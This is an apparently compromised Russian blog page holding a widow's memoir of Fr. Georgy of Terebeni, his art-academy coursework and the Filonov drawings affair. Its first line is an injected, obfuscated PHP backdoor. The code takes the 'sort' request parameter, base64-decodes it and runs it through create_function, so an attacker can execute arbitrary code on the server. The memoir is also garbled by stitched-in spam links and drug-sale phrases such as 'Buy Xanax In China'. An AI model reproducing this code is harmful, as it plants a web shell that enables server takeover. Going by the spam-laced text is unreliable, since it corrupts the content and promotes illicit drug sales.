nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

ФАВОРСКИЙ ПОИСК


http://letterforma.com/roofing-contract/roofing-contract-free-printable-roofing-proposal-form-freeware-jpg/ эпиграфы:

http://mwbuzz.com/index.php/5-best-moments-from-zayns-action-packed-let-me-music-video/ 1)                     ” А  отец-то Георгий  в  священники-то http://soligenix.com/?p=605  п р о л е з !”
(А  мне, вдове:) “Вы, может, бороду  себе  приклеете ?”
реплики  нынешнего  Опочецкого  б л а г о ч и н н о г о (а когда ремонт в Теребенской церкви делали, малярши по алтарному престолу, крася потолок, ходили!)
2)
Buy Diazepam Rectal Tubes — КТО  ДНЁМ  С  ОГНЁМ  ИГРАЕТ  –  ТОТ  НОЧЬЮ  ПИСАЕТСЯ !
о.Георгий  тёткам, которые  в тонкие  моменты  литургии  ставят  свечи  и  выковыривают  огарки

http://terranealife.com/category/food-drink/feed/ Продолжу  обзор  учебных (курсовых) работ  в  Академии  Художеств  будущего  о.Георгия, или  же  прозываемого (словущего) Егором  в  бытность  его  научным  сотрудником  Государственного  Русского  музея. Только  сейчас, спустя  четыре  десятилетия, я  начинаю  понимать  не  столько  логику  этих  курсовых, сколько  их   п р о м ы с л и т е л ь н о с т ь.

http://rock107.com/the-kinks-dave-davies-says-long-in-the-works-documentary-strangers-may-be-finished-this-summer/ Но  предварю  одну  историю  другой.
Все,  кто  сталкивался  с  о.Георгием,  знал  по  себе, что  у  него  был  необыкновенный  талант  общения, умения  входить  в  дружеские  отношения  “с  полоборота”. И  вот  только  начав  работать  в  Русском  музее  в  рабочей  бригаде, едва  пересекнувшись  с  не  менее  коммуникабельным  легендарным  директором  музея  Василием Алексеевичем  Пушкарёвым, они, как  говорится,  как  два  рыбака  учуяли  друг  друга  издалека. И  о.Георгий  всю жизнь  гордился  своим  тайным  подвигом,  совершённым  по  профессиональной  просьбе  В.А.Пушкарёва: растопить  сердце  Евдокии  Николаевны  Глебовой, сестры  художника  Филонова, чтобы  она  распорядилась  хранящимися  у  неё  картинами  знаменитого брата  в  пользу  музея. Миссия  на  психологическом  уровне  была  выполнена. На  “материальном”,  так  сказать, уровне  я  даже  не  буду  трогать  эту  детективную  тему,  хотя  в  середине  этих  многолетних  драматических  ситуаций  Теребени  сыграли  в  ней  определённую  моральную  роль.
В  первый  же  или  второй  год  нашего  переезда  из  Петербурга  в  Теребени  отцу Георгию  позвонила  та  научная  сотрудница  отдела  рисунка  Русского  музея, о  которой  я  уже  писала  в  своей  мемории  “Сновиденье  в  воскресенье”, в  которой  я  рассказывала  о  моей  помощи  ей  в  идентификации  портрета  Наталии  Николаевны  Пушкиной.
И  вот  Татьяна  Владимировна  звонит  и  говорит: “Егорушка, беда ! Как  ты  скажешь  –  так  я  и  сделаю. Обнаружила  подмену  очередных  рисунков  Филонова.  Страшновато  стало  – ведь  та-а-кое   опять  начнётся . . .  Благословишь  –  пойду  заявлю. А  может, не  торопиться  с  этим ? Вот  что  посоветуешь?”
Этот  телефонный  разговор  был  при  мне. Муж  помолчал, задумавшись, точнее  сказать,  молитвенно  сосредоточившись,  и  решительно  сказал: “Да, иди, благословляю !”  И,  как  говорится “понеслось” . . . Быстро  нашли  подменщиков  рисунков, началось  уголовное  дело. А  этим  подменщикам  добродушный  знакомый  по  музею  (Серёжа  Симановский, давно  покойный  друг  о.Георгия) посоветовал  позвонить  в  Теребени, исповедаться  хотя  бы  по  телефону  и  испросить  усиленных  молитв. Было  удивительно: бывало  одни  за  другими  звонят  Татьяна  Владимировна (“Мне  страшно!”), вслед  за  ней  один  из  подменщиков (“Мне  страшно!”).Этот  этап  многолетнего  дела  разрешился  . . .  условным , само  по  себе  не бывалое,  д е в я т и л е т н и м   сроком  для  подменщиков  и   очередным  профессиональным  торжеством  Татьяны  Владимировны.

Phentermine To Buy Но  вернусь  в  середину  семидесятых  годов,  к  третьей  курсовой  работе  Егора, будущего  о.Георгия. Опять  мне  показался  странным  выбор  её  темы:
“Иллюстрации   В.А.Фаворского  к  библейской  “Книге  Руфь”  и  к  трагедии  Андрея  Глобы  “Фамарь””.

О, это  была  эпопея !  Сейчас  представить  себе  трудно,  насколько  в  те  наши  годы  труднодоступна  была  для  ознакомления  Библия. Но  этого  Георгию было  мало. Как  в  военные  годы  говорили, ему  надо  было  “в з я т ь    я з ы к а”, то  есть  человека,  обладающего  особой  информацией. Какой  же ? Повторяю,мне   в с ё   было  непонятно.
После  тщательных  поисков  среди  знакомых, через  их  в  свою  очередь “многоступенчатые”  знакомства  Георгий  вышел  на  великолепного  литературоведа  и  вообще,  как бы  сейчас  сказали  – культуролога  Добина  Ефима  Семёновича (1901 -1977), и  что  особо  важно  было  для  темы  Георгия  –  Добин  полностью  находился  в  “этнической”, библейской  теме.
Георгий  созвонился  с  ним, напросившись  в  гости. И  меня  взял  с  собой.
Кого  только  ни  видела  эта  квартира, каких  мыслителей  и  творческих  деятелей ! Так  и  должно  быть  в  культурной-то  столице, в одном  из  лучших  городов  мира. Я, например, в  детстве, когда  зимой  выбегала  из  музыкальной  школы  до  троллейбусной  остановки  на  Литейном, то  забегала  погреться  в  музей-квартиру  Некрасова, что  над  остановкой, в  бельэтаже. Там  пряталась  за  штору  и смотрела  из  окошка  на  номер  подходящего  транспорта. Увидев  нужный  номер, как  мышь, проскальзывала  сквозь  группы  экскурсантов  и  кубарем  скатившись  по  лестнице,  успевала  запрыгнуть  в  троллейбус.
А  тут  мы  с  Георгием  чинно  и  благородно  вошли  в  такую же  наполненную культурными  “миазмами”  квартиру. А  там  уже  был  гость,  да  настолько  непростой,  что  до  сих  пор  ломаю  голову кто: может, Шостакович? Может, Козинцев? Но  кто-то  такого  же   п л а н а. Мы  явно  помешали  их  беседе. Но  поскольку  мы  были  званными  гостями, то  тот  гость  смиренно  отсел  подальше, но  постоянно  довлел  своим  мощным  присутствием.
Мой  муж  пришёл  с  чётко  подготовленными  вопросами,  поэтому  получал  чёткие  вразумительные  ответы – только  за  их  мыслями  я  абсолютно  не  поспевала: это  было  в  духе  “бжжик,бжжик, бжжик – уноси  на  новенького!”, да и  тот  гость, повторяю, довлел.
Меня  и  тогда  и  до  сих  пор  удивлял  не  собственно  художественный,  искусствоведческий  характер  их  беседы,  а  некий   ж и з н е в е д ч е с к и й.  Коммунально-бытовые  взаимоотношения  библейских  персонажей, гениально  выгравированных  в  своих  иллюстрациях  Фаворским  –  вот  что  было  в  разговоре  главным. Механизмы  человеческого  общения ! Конечно  же, хозяин  квартиры  знал   л и ч н о   и  Фаворского, и  его  друга  Флоренского , и  многих, делавших  отечественную  историю, чьи  имена  были  для  меня  просто  именами. Я  поняла, что  Георгий  старается  попасть  след  в  след  с  Фаворским  в  его  поиске  сакрального  пути  жизни  в  Вечность. Ему  это  удалось. Сейчас  я  могу  констатировать,  что  именно  с  этой  курсовой  начался  его  путь  к  священству.
Четвёртой,  заключительной  перед  дипломом, была  тема  курсовой  “Происхождение  церковного  оклада”.
А  темой  блестяще  защищённого  диплома – “Переход  от  иконы  через  парсуну  к  портрету”.
Именно  поэтому  Георгий,  когда  только  поехал  (в  1987 году) по  совету  тогдашнего  митрополита  Псковского Владимира  (Котлярова) посмотреть  безвестную  церковь  в  далёких  и  непристижных  Теребенях  на  предмет  будущего  настоятельства (с 1988 года), муж, увидев  просто  воплощение  своего  диплома,  сразу  во  всеуслышание  заявил:
— Здесь, в  Теребенях,  меня  похоронят !
Элементами  пророчества  он  славился . . .,
. . .Также  он  задолго  до  смерти  говаривал: “Будет  ремонт  –  умру !” И  ведь  в  самом  деле  умер,  как  оказалось,  через  несколько  часов  после  подписания  всех  пакетов  документов  на  ремонт ! И  в  самом  деле, ведь  и  полугода  не  прошло,  как  по  оставшимся  в  алтаре  иконам Ambien Buy Mail Order пошла   п л е с е н ь !!!

Buy Xanax In China           ВЫСТАВКА  ВЕНЕЦИАНОВА ,1983 ГОД

 


Добавить комментарий

http://allovermedia.com/outdoor/ Для отправки комментария вам необходимо авторизоваться.